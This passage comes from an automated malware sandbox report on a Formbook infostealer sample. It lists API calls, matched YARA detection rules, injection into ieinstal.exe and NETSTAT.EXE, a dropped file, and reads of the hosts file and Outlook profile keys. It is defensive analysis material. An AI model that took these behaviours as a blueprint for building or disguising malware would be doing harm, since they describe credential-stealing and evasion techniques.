          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10429850 NtCreateFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10429900 NtReadFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10429980 NtClose
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10429A30 NtAllocateVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042984A NtCreateFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_104298FD NtReadFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042997A NtClose
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10429A2A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE9A30 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE9850 NtCreateFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE9980 NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE9900 NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE9A2A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE98FD NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE984A NtCreateFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE997A NtClose
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05441D55
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05370D20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05442D07
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_054425DD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053A2581
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0538D5E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0543D466
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0538841F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0544DFCE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05441FF1
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05396E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0543D616
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05442EF7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05394120
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0537F900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05431002
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0544E824
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053A20A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0538B090
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_054428EC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_054420A8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_05442B28
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053AEBB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_0543DBD2
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_054303DA
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_054422AE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042D032
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10411030
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042E100
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10412D8C
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10412D90
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042CE00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042CF4F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10419F7B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10419F80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10412FB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042C7B3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DD9F80
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DD2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DD9F7B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DD2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DD2D8C
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: String function: 0537B150 appears 45 times
          Source: Dgslimt_Signed_.exe | Static PE information: invalid certificate
          Source: Dgslimt_Signed_.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Dgslimt_Signed_.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Dgslimt_Signed_.exe, 00000000.00000000.241042671.00000000004B1000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe
          Source: Dgslimt_Signed_.exe | Binary or memory string: OriginalFilenameProcexp.exeB vs Dgslimt_Signed_.exe
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.350983552.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.506448280.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.256839254.00000000045AC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.245136247.0000000004534000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.256638693.00000000045AC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.509897320.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.351123790.0000000003830000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.256976459.00000000045AC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.256419246.00000000045AC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.354123960.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000003.246042887.00000000045AC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.246162017.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.250121569.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.245888864.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.250000220.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 00000000.00000003.250220822.00000000045AC000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1], type: DROPPEDMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/4@6/2
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Dgsllll[1]
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: unknown | Process created: C:\Users\user\Desktop\Dgslimt_Signed_.exe 'C:\Users\user\Desktop\Dgslimt_Signed_.exe'
          Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
          Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
          Source: C:\Users\user\Desktop\Dgslimt_Signed_.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Program Files (x86)\internet explorer\ieinstal.exe'
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | File written: C:\Users\user\AppData\Roaming\N64OT294\N64logri.ini
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Dgslimt_Signed_.exe | Static file information: File size 1856114 > 1048576
          Source: Binary string: netstat.pdbGCTL source: ieinstal.exe, 00000004.00000002.350880152.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: ieinstal.pdbGCTL source: NETSTAT.EXE, 0000000F.00000002.512183965.000000000376F000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.323236213.000000000FA80000.00000002.00000001.sdmp
          Source: Binary string: ieinstal.pdb source: NETSTAT.EXE, 0000000F.00000002.512183965.000000000376F000.00000004.00000001.sdmp
          Source: Binary string: netstat.pdb source: ieinstal.exe, 00000004.00000002.350880152.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000004.00000002.353345900.0000000005350000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.510200148.000000000321F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: ieinstal.exe, NETSTAT.EXE, 0000000F.00000002.510200148.000000000321F000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.323236213.000000000FA80000.00000002.00000001.sdmp
          Source: Dgslimt_Signed_.exe | Static PE information: real checksum: 0xd23ba should be: 0x1ca790
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_053CD0D1 push ecx; ret 4_2_053CD0E4
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_10427A53 push cs; ret 4_2_10427A5A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042DA38 push dword ptr [2E33947Ah]; ret 4_2_1042DA36
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1041E48A push edx; retf 4_2_1041E48B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_104135CA push FFFFFF94h; iretd 4_2_104135CC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042D609 push cs; retf 4_2_1042D60A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042C6C5 push eax; ret 4_2_1042C718
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042C77C push eax; ret 4_2_1042C782
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042C712 push eax; ret 4_2_1042C718
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042C71B push eax; ret 4_2_1042C782
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042D7CF push dword ptr [2E33947Ah]; ret 4_2_1042DA36
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4_2_1042D798 push esp; ret 4_2_1042D79C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DE7A53 push cs; ret 15_2_02DE7A5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DEDA38 push dword ptr [2E33947Ah]; ret 15_2_02DEDA36
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DEC6C5 push eax; ret 15_2_02DEC718
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DED609 push cs; retf 15_2_02DED60A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_02DED7CF push dword ptr [<